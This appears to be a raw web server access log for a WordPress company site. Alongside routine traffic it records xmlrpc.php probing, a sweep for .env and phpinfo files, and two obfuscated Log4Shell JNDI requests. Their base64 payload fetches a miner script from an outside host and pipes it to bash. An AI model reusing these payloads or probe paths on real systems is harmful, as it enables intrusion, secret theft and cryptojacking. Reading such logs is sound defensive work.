43.133.139.6 - - [04/Sep/2025:08:50:26 +0800] "GET /wp-content/uploads/2025/07/1753405252-Services_Banner2000 HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.37.243 - - [04/Sep/2025:08:50:30 +0800] "GET /process/processing HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:08:56:53 +0800] "POST /wp-cron.php?doing_wp_cron=1756947413.7477719783782958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.205.110.167 - - [04/Sep/2025:08:56:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
43.157.170.126 - - [04/Sep/2025:08:59:13 +0800] "GET /wp-content/uploads/2025/07/1751857929-3D-one-stop-supply-chain-service-W900px2.webp HTTP/1.1" 200 38362 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:09:06:36 +0800] "POST /wp-cron.php?doing_wp_cron=1756947996.3753240108489990234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [04/Sep/2025:09:06:36 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.133.220.37 - - [04/Sep/2025:09:08:10 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:09:08:31 +0800] "POST /wp-cron.php?doing_wp_cron=1756948111.1878120899200439453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
82.223.216.36 - - [04/Sep/2025:09:08:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:09:17:29 +0800] "POST /wp-cron.php?doing_wp_cron=1756948649.3636169433593750000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [04/Sep/2025:09:17:29 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.153.26.165 - - [04/Sep/2025:09:21:42 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 200 348798 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
129.226.213.145 - - [04/Sep/2025:09:30:04 +0800] "GET /wp-content/uploads/2025/06/1750674554-qizhoudalou2000x400_2025624.webp HTTP/1.1" 200 47874 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:09:32:46 +0800] "POST /wp-cron.php?doing_wp_cron=1756949565.9942901134490966796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
120.138.19.65 - - [04/Sep/2025:09:32:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:09:37:23 +0800] "POST /wp-cron.php?doing_wp_cron=1756949843.7268700599670410156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [04/Sep/2025:09:37:24 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Sep/2025:09:43:51 +0800] "POST /wp-cron.php?doing_wp_cron=1756950231.8874039649963378906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.168.120.227 - - [04/Sep/2025:09:43:51 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [04/Sep/2025:09:50:01 +0800] "POST /wp-cron.php?doing_wp_cron=1756950601.3791921138763427734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.165.69.68 - - [04/Sep/2025:09:50:01 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.165.69.68 - - [04/Sep/2025:09:50:03 +0800] "GET / HTTP/1.1" 200 33465 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:09:58:51 +0800] "POST /wp-cron.php?doing_wp_cron=1756951130.9972240924835205078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.210.194.206 - - [04/Sep/2025:09:58:51 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:10:04:15 +0800] "POST /wp-cron.php?doing_wp_cron=1756951455.2447869777679443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.179.227 - - [04/Sep/2025:10:04:15 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:10:07:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756951634.5273559093475341796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [04/Sep/2025:10:07:15 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
45.135.193.100 - - [04/Sep/2025:10:07:21 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Sep/2025:10:10:39 +0800] "POST /wp-cron.php?doing_wp_cron=1756951839.5936429500579833984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.121 - - [04/Sep/2025:10:10:39 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:10:12:37 +0800] "POST /wp-cron.php?doing_wp_cron=1756951957.8994529247283935546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
150.95.110.113 - - [04/Sep/2025:10:12:38 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:10:20:09 +0800] "POST /wp-cron.php?doing_wp_cron=1756952409.0001459121704101562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [04/Sep/2025:10:20:09 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Sep/2025:10:21:40 +0800] "POST /wp-cron.php?doing_wp_cron=1756952500.6838929653167724609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
78.153.140.224 - - [04/Sep/2025:10:21:40 +0800] "GET /.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Linux Mint/7 (Gloria) Firefox/3.0.11"
78.153.140.224 - - [04/Sep/2025:10:21:42 +0800] "GET /api/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALNJS)"
36.133.115.36 - - [04/Sep/2025:10:21:49 +0800] "POST /wp-cron.php?doing_wp_cron=1756952509.8685669898986816406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
78.153.140.224 - - [04/Sep/2025:10:21:49 +0800] "GET /backend/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Linux; Android 6.0.1; 5056N Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/50.0.2661.86 Mobile Safari/537.36"
78.153.140.224 - - [04/Sep/2025:10:21:51 +0800] "GET /admin/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.6) Gecko/20100118 Gentoo Firefox/3.5.6"
78.153.140.224 - - [04/Sep/2025:10:21:53 +0800] "GET /.env.example HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.10) Gecko/20070223 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10 pango-text"
78.153.140.224 - - [04/Sep/2025:10:21:56 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; HP Slate 7 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.224 - - [04/Sep/2025:10:21:58 +0800] "GET /?phpinfo=-1 HTTP/1.1" 301 5 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
80.75.212.83 - - [04/Sep/2025:10:22:04 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
78.153.140.224 - - [04/Sep/2025:10:22:06 +0800] "GET /?phpinfo=-1 HTTP/1.1" 200 151919 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
80.75.212.83 - - [04/Sep/2025:10:22:06 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
78.153.140.224 - - [04/Sep/2025:10:22:09 +0800] "GET /?url=.env HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15"
78.153.140.224 - - [04/Sep/2025:10:22:14 +0800] "GET /?url=.env HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15"
78.153.140.224 - - [04/Sep/2025:10:22:15 +0800] "GET /staging/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0"
78.153.140.224 - - [04/Sep/2025:10:22:18 +0800] "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412 (KHTML, like Gecko) Safari/412 Privoxy/3.0"
78.153.140.224 - - [04/Sep/2025:10:22:22 +0800] "GET /phpinfo.php HTTP/1.1" 404 27 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15"
78.153.140.224 - - [04/Sep/2025:10:22:23 +0800] "GET /info/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5"
78.153.140.224 - - [04/Sep/2025:10:22:26 +0800] "GET /app/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
78.153.140.224 - - [04/Sep/2025:10:22:28 +0800] "GET /phpinfo/ HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
78.153.140.224 - - [04/Sep/2025:10:22:30 +0800] "GET /dev/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HTC_One_M8 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.224 - - [04/Sep/2025:10:22:32 +0800] "GET /.env.production HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko)"
78.153.140.224 - - [04/Sep/2025:10:22:34 +0800] "GET /.env.save HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)"
78.153.140.224 - - [04/Sep/2025:10:22:36 +0800] "GET /demo/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en-gb) AppleWebKit/526+ (KHTML, like Gecko) Version/3.1 iPhone"
78.153.140.224 - - [04/Sep/2025:10:22:37 +0800] "GET /laravel/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0"
78.153.140.224 - - [04/Sep/2025:10:22:40 +0800] "GET /.config.yaml HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0"
78.153.140.224 - - [04/Sep/2025:10:22:42 +0800] "GET /info HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28"
78.153.140.224 - - [04/Sep/2025:10:22:44 +0800] "GET /secrets.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0"
36.133.115.36 - - [04/Sep/2025:10:22:47 +0800] "POST /wp-cron.php?doing_wp_cron=1756952567.3670370578765869140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
78.153.140.224 - - [04/Sep/2025:10:22:47 +0800] "GET /core/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36"
78.153.140.224 - - [04/Sep/2025:10:22:50 +0800] "GET /server/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Linux; Android 4.4.2; rk31sdk Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36"
78.153.140.224 - - [04/Sep/2025:10:22:52 +0800] "GET /test/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
78.153.140.224 - - [04/Sep/2025:10:22:54 +0800] "GET /web/.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0"
78.153.140.224 - - [04/Sep/2025:10:22:57 +0800] "GET /test HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
78.153.140.224 - - [04/Sep/2025:10:22:58 +0800] "GET /.env.bak HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0"
36.133.115.36 - - [04/Sep/2025:10:27:03 +0800] "POST /wp-cron.php?doing_wp_cron=1756952823.2906749248504638671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
161.97.186.72 - - [04/Sep/2025:10:27:03 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:10:40:12 +0800] "POST /wp-cron.php?doing_wp_cron=1756953612.1355750560760498046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [04/Sep/2025:10:40:12 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Sep/2025:10:42:07 +0800] "POST /wp-cron.php?doing_wp_cron=1756953727.3897860050201416015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
216.37.42.34 - - [04/Sep/2025:10:42:07 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:10:58:58 +0800] "POST /wp-cron.php?doing_wp_cron=1756954738.5620000362396240234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
75.119.208.120 - - [04/Sep/2025:10:58:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:11:09:36 +0800] "POST /wp-cron.php?doing_wp_cron=1756955376.3988680839538574218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [04/Sep/2025:11:09:36 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Sep/2025:11:16:10 +0800] "POST /wp-cron.php?doing_wp_cron=1756955770.3975269794464111328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.144.120.196 - - [04/Sep/2025:11:16:10 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
170.106.163.84 - - [04/Sep/2025:11:16:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.163.84 - - [04/Sep/2025:11:16:42 +0800] "GET / HTTP/1.1" 200 33465 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:11:34:36 +0800] "POST /wp-cron.php?doing_wp_cron=1756956876.4565210342407226562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
203.217.101.237 - - [04/Sep/2025:11:34:36 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:11:44:24 +0800] "POST /wp-cron.php?doing_wp_cron=1756957463.9728720188140869140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [04/Sep/2025:11:44:24 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Sep/2025:11:47:09 +0800] "POST /wp-cron.php?doing_wp_cron=1756957629.3632218837738037109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.232.151.112 - - [04/Sep/2025:11:47:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.232.151.112 - - [04/Sep/2025:11:47:13 +0800] "GET / HTTP/1.1" 200 33465 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Sep/2025:11:50:34 +0800] "POST /wp-cron.php?doing_wp_cron=1756957834.5946440696716308593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.95.216.149 - - [04/Sep/2025:11:50:34 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:12:02:46 +0800] "POST /wp-cron.php?doing_wp_cron=1756958566.0428109169006347656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
65.181.112.107 - - [04/Sep/2025:12:02:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:12:13:14 +0800] "POST /wp-cron.php?doing_wp_cron=1756959194.5987000465393066406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [04/Sep/2025:12:13:14 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Sep/2025:12:14:03 +0800] "POST /wp-cron.php?doing_wp_cron=1756959243.2157740592956542968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.240.223.202 - - [04/Sep/2025:12:14:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [04/Sep/2025:12:15:10 +0800] "POST /wp-cron.php?doing_wp_cron=1756959310.3500509262084960937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
146.190.140.214 - - [04/Sep/2025:12:15:10 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [04/Sep/2025:12:25:54 +0800] "POST /wp-cron.php?doing_wp_cron=1756959954.4143929481506347656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [04/Sep/2025:12:26:54 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [04/Sep/2025:12:27:38 +0800] "POST /wp-cron.php?doing_wp_cron=1756960058.9364759922027587890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [04/Sep/2025:12:27:39 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.236.17.88 - - [04/Sep/2025:12:28:59 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [04/Sep/2025:12:29:03 +0800] "POST /wp-cron.php?doing_wp_cron=1756960143.8147029876708984375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
